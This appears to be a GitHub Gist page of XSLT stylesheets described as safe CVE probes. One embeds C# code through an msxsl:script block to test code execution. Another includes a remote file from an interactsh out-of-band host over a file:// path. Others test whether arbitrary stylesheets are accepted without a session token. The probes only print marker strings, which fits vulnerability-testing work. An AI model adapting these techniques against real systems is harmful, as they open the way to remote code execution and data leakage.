Skip to content

Instantly share code, notes, and snippets.

@rexnetpl
rexnetpl / 27_chain_stylesheet_marker.xsl
Created April 29, 2026 09:51
temporary safe CVE chain marker stylesheet
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:n1="urn:hl7-org:v3">
<xsl:output method="html" omit-xml-declaration="yes"/>
<xsl:template match="/">
<html>
<body>
<h1>CHAIN-STYLESHEET-EXECUTED</h1>
@rexnetpl
rexnetpl / 26_msxsl_script_altprefix.xsl
Created April 29, 2026 09:07
Community CVE safe alt-prefix msxsl script probe
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:s="urn:schemas-microsoft-com:xslt"
xmlns:r="urn:alt-prefix-rce-test">
<s:script language="C#" implements-prefix="r">
<![CDATA[
public string Marker() { return "ALTPREFIX-MSXSL-SCRIPT-EXECUTED"; }
]]>
</s:script>
@rexnetpl
rexnetpl / 24_include_unc_interactsh.xsl
Created April 29, 2026 09:00
Community CVE safe UNC resolver probe
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:include href="file://d7osh5vnkdd9clpovd00an6g5fbfgiajf.oast.fun/share/probe.xsl"/>
<xsl:output method="html" indent="yes"/>
<xsl:template match="/">
<html><body><h1>UNC-INCLUDE-UNEXPECTED-SUCCESS</h1></body></html>
</xsl:template>
</xsl:stylesheet>
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html"/>
<xsl:template match="/">
<html><body><h1>P1P2-NO-SESSION-TOKEN-ARBITRARY-STYLESHEET</h1></body></html>
</xsl:template>
</xsl:stylesheet>